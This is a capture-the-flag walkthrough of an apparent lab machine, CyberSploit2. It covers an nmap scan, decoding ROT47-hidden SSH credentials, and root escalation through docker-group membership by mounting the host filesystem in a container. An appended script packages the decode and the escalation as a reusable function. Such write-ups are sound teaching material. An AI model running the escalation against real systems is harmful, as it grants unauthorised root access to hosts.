1. Find the target IP: 192.168.0.131
nmap -sn 192.168.0.0/24
2. Scan the target's ports
root@kali:~# nmap -p- -A 192.168.0.130
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.130
Host is up (0.00070s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 01:1b:c8:fe:18:71:28:60:84:6a:9f:30:35:11:66:3d (DSA)
| 2048 d9:53:14:a3:7f:99:51:40:3f:49:ef:ef:7f:8b:35:de (RSA)
|_ 256 ef:43:5b:d0:c0:eb:ee:3e:76:61:5c:6d:ce:15:fe:7e (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Hello Pentester!
MAC Address: 08:00:27:F1:D7:A0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.70 ms 192.168.0.130
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.91 seconds
3. Browse to port 80. Among several normal-looking username/password pairs there is one that does not look normal at all:
Taking it off to decode, the guess was a character shift, and one applied to the whole string rather than to letters only, so plain ROT13 would not do. An online ROT47 decoder turned the blob into the credentials:
D92:=6?5C2 4J36CDA=@:E`
shailendra cybersploit1
4. SSH in with the username and password shailendra/cybersploit1. The home directory holds a hint file, hint.txt, whose entire content is "docker", an old friend by now. Check `id` right away: the user is indeed in the docker group. Membership in that group means the user can talk to the Docker daemon's socket, and the daemon runs as root, so this is effectively root on the host. First check whether any image is present locally; there is none, so once again an image has to be pulled over the network. After that it is the same operation as before: run a container with the host's / mounted inside it, which gives root access to the host filesystem, and read the flag.
root@kali:~# ssh shailendra@192.168.0.131
shailendra@192.168.0.131's password: cybersploit1 (typed, not echoed)
There were 3 failed login attempts since the last successful login.
Last login: Wed Jul 15 12:32:09 2020
[shailendra@localhost ~]$ ls
hint.txt
[shailendra@localhost ~]$ cat hint.txt
docker
[shailendra@localhost ~]$ id
uid=1001(shailendra) gid=1001(shailendra) groups=1001(shailendra),991(docker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[shailendra@localhost ~]$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
[shailendra@localhost ~]$ docker pull alpine
Using default tag: latest
latest: Pulling from library/alpine
df20fa9351a1: Pull complete
Digest: sha256:185518070891758909c9f839cf4ca393ee977ac378609f700f60a771a2dfe321
Status: Downloaded newer image for alpine:latest
docker.io/library/alpine:latest
[shailendra@bogon ~]$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest a24bb4013296 7 weeks ago 5.57MB
[shailendra@bogon ~]$ docker run -v /:/mnt -it alpine
/ # id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
/ # cd /mnt/root/
/mnt/root # ls
anaconda-ks.cfg flag.txt get-docker.sh logs}
/mnt/root # cat flag.txt
__ ___ _ __ ___ __ _____ __
/ /` / / \ | |\ | / /`_ | |_) / /\ | | ( (`
\_\_, \_\_/ |_| \| \_\_/ |_| \ /_/--\ |_| _)_)
Pwned CyberSploit2 POC
share it with me twitter@cybersploit1
Thanks !
/mnt/root #
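The two techniques in this walkthrough, the ROT47 decode from step 3 and the docker-group escalation from step 4, as an added example that is not part of the original write-up. The credential blob is the one from the page; everything else (function names, the brute-force filter, the `chroot /mnt` variant of the container command, the path /var/run/docker.sock) is an assumption of this example and not something the box or the author specified.

```sh
#!/bin/sh
# Added example, not from the original walkthrough: a ROT47 decoder for the
# credential blob in step 3, a brute-force over all shifts of the same
# alphabet, and a check-then-escalate helper for the docker-group step.

# ROT47 rotates the 94 printable ASCII characters ('!' .. '~') by 47, so the
# same function both encodes and decodes: applying it twice is the identity.
rot47() {
    printf '%s' "$1" | tr '!-~' 'P-~!-O'
}

# Rotate every printable character of $1 by $2 positions (mod 94); other
# bytes (space, newline) pass through unchanged. rotn TEXT 47 == rot47 TEXT.
rotn() {
    text=$1
    shift_by=$2
    printf '%s' "$text" | od -An -v -tu1 | tr -s ' \n' '\n' | sed '/^$/d' |
    while read -r code; do
        if [ "$code" -ge 33 ] && [ "$code" -le 126 ]; then
            code=$(( (code - 33 + shift_by) % 94 + 33 ))
        fi
        # emit the byte as an octal escape so any printable value survives
        printf "\\$(printf '%03o' "$code")"
    done
}

# Try every non-zero shift and print only those whose output is made of
# lowercase letters, digits and spaces. With the page's blob, shifts 47 and 48
# both pass this filter; only 47 reads as words, so a human still picks.
bruteforce() {
    i=1
    while [ "$i" -lt 94 ]; do
        out=$(rotn "$1" "$i")
        if [ -z "$(printf '%s' "$out" | tr -d 'a-z0-9 ')" ]; then
            printf '%2d: %s\n' "$i" "$out"
        fi
        i=$((i + 1))
    done
}

# Step 4 in one function. A user in the docker group can talk to the daemon's
# socket, and the daemon runs as root, so mounting the host's / into a
# container and chroot-ing into it yields a root shell on the host.
# Assumes the docker CLI is installed and alpine can be pulled, as on the page;
# the socket path is the default and is an assumption of this example.
docker_root_shell() {
    id -nG | tr ' ' '\n' | grep -qx docker \
        || { echo "not in the docker group" >&2; return 1; }
    [ -w /var/run/docker.sock ] \
        || { echo "docker socket not writable" >&2; return 1; }
    docker run --rm -it -v /:/mnt alpine chroot /mnt /bin/sh
}

# Demo on the blob from the page (constructed input copied from step 3).
bruteforce 'D92:=6?5C2 4J36CDA=@:E`'
```

Running the script prints the candidate shifts; `rot47 'shailendra cybersploit1'` gives the original blob back, which is the quick way to confirm the decode. `docker_root_shell` is interactive and is only invoked by hand on the target; the two guard checks are what you would run first on any shell to decide whether the docker route is open at all.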